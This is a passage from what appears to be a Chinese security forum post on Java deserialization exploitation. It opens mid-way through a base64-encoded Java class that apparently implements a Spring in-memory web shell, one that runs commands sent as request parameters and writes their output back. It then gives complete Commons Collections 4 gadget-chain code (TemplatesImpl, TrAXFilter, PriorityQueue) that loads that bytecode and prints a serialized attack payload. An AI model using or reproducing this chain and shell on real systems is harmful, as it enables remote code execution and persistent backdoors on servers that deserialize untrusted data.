i9SZXF1ZXN0Q29uZGl0aW9uOylWAQAPcmVnaXN0ZXJNYXBwaW5nAQBuKExvcmcvc3By
aW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJb
mZvO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7KVY
BAApnZXRSZXF1ZXN0AQApKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0Um
VxdWVzdDsBAAtnZXRSZXNwb25zZQEAKigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2
VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7A
QAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N
0cmluZzsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZ
QEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9D
aGFyU2VxdWVuY2U7KVoBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEW
phdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucH
V0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgE
AJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQ
BAAMoKVoBAARuZXh0AQAFY2xvc2UBAAV3cml0ZQEABWZsdXNoAQAJc2VuZEVycm9yA
QAEKEkpVgAhAAgAOQAAAAAABgABADoAOwACADwAAAEFAAkACAAAAHEqtwABuAA
CEgMDuQAEAwDAAAVMKxIGuQAHAgDAAAZNEggSCQO9AAq2AAtOuwAMWQS9AA1Z
AxIOU7cADzoEuwAQWQO9ABG3ABI6BbsAE1kZBBkFAQEBAQG3ABQ6BrsACFkSFbcAFjo
HLBkGGQcttgAXsQAAAAIAPQAAACoACgAAABYABAAYABMAGQAfABoAKwAbAD0AHAB
KAB0AXAAeAGcAHwBwACAAPgAAAFIACAAAAHEAPwBAAAAAEwBeAEEAQgABAB8AUg
BDAEQAAgArAEYARQBGAAMAPQA0AEcASAAEAEoAJwBJAEoABQBcABUASwBMAAYAZw
AKAE0AQAAHAE4AAAAGAAIATwBQAAEAOgBRAAIAPAAAAD0AAQACAAAABSq3AAGxA
AAAAgA9AAAACgACAAAAIgAEACQAPgAAABYAAgAAAAUAPwBAAAAAAAAFAFIAUwAB
AFQAAAAFAQBSAAAAAQBVADsAAgA8AAAB4QAGAAgAAADGuAACwAAYwAAYtgAZTL
gAAsAAGMAAGLYAGk0suQAbAQBOKxIcuQAdAgA6BBIeOgUSH7gAILYAIRIitgAjmQAiuw
AkWQa9AA1ZAxIlU1kEEiZTWQUZBFO3ACc6BqcAH7sAJFkGvQANWQMSKFNZBBIpU1kFG
QRTtwAnOga7ACpZGQa2ACu2ACy3AC0SLrYALzoHGQe2ADCZAAsZB7YAMacABRkFOgU
ZB7YAMi0ZBbYAMy22ADQttgA1pwAOOgUsEQGUuQA3AgCxAAEAKwC3ALoANgADAD0
AAABKABIAAAAnAA0AKAAaACkAIQAqACsALAAvAC4APwAvAF4AMQB6ADMAkAA0AKQ
ANQCpADYArwA3ALMAOAC3ADsAugA5ALwAOgDFADwAPgAAAGYACgBbAAMAVgBXA
AYALwCIAFgAUwAFAHoAPQBWAFcABgCQACcAWQBaAAcAvAAJAFsAXAAFAAAAxgA/AE
AAAAANALkAXQBeAAEAGgCsAF8AYAACACEApQBhAGIAAwArAJsAYwBTAAQAZAAAAE
UABv8AXgAGBwBlBwBmBwBnBwBoBwBpBwBpAAD8ABsHAGr8ACUHAGtBBwBp/wAXAA
UHAGUHAGYHAGcHAGgHAGkAAQcAbAoATgAAAAQAAQA2AAEAbQBuAAMAPAAAAD8
AAAADAAAAAbEAAAACAD0AAAAGAAEAAABAAD4AAAAgAAMAAAABAD8AQAAAAAA
AAQBvAHAAAQAAAAEAcQByAAIATgAAAAQAAQBzAFQAAAAJAgBvAAAAcQAAAAEAbQ
B0AAMAPAAAAEkAAAAEAAAAAbEAAAACAD0AAAAGAAEAAABEAD4AAAAqAAQAAAAB
AD8AQAAAAAAAAQBvAHAAAQAAAAEAdQB2AAIAAAABAHcAeAADAE4AAAAEAAEAcw
BUAAAADQMAbwAAAHUAAAB3AAAACQB5AHoAAwA8AAAAQQACAAIAAAAJuwAIWbc
AOEyxAAAAAgA9AAAACgACAAAARwAIAEgAPgAAABYAAgAAAAkAewB8AAAACAABAH
0AQAABAE4AAAAEAAEANgBUAAAABQEAewAAAAEAfgAAAAIAfw==
然后构造 cc4 的链子
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javassist.ClassPool;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;
public class CC4 {
public static void main(String[] args) throws Exception{
//byte[] code = ClassPool.getDefault().get("shell").toBytecode();
byte[] code = Base64.getDecoder().decode("yv66vgAAADQA7QoAOQCACg...");
//内存马的 base64
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates, "_bytecodes", new byte[][]{code});
setFieldValue(templates, "_name", "aaa");
setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new
Class[]{Templates.class}, new Object[]{templates});
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
//instantiateTransformer
new InstantiateTransformer(new Class[]{Templates.class}, new
Object[]{templates})
};
ChainedTransformer chainedTransformer = new
ChainedTransformer(transformers);
TransformingComparator comparator = new
TransformingComparator(chainedTransformer);
//PriorityQueue 实例
PriorityQueue priorityQueue = new PriorityQueue(2);
//先设置为正常变量值,后面可以通过 setFieldValue 修改
priorityQueue.add(1);
priorityQueue.add(1);
//反射设置 Field
Object[] objects = new Object[]{templates,1};
setFieldValue(priorityQueue, "queue", objects);
setFieldValue(priorityQueue, "comparator", comparator);
serialize(priorityQueue);
//unserialize("ser.bin");
}
public static void setFieldValue(Object object, String fieldName, Object value) throws
Exception{
Field field = object.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(object, value);
}
public static void serialize(Object obj) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(obj);
oos.close();
System.out.println(new
String(Base64.getEncoder().encode(baos.toByteArray())));
}
public static Object unserialize(String Filname) throws Exception,
ClassNotFoundException {
FileInputStream fis = new FileInputStream(Filname);
ObjectInputStream ois = new ObjectInputStream(fis);
Object obj = ois.readObject();
return obj;
}
}
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|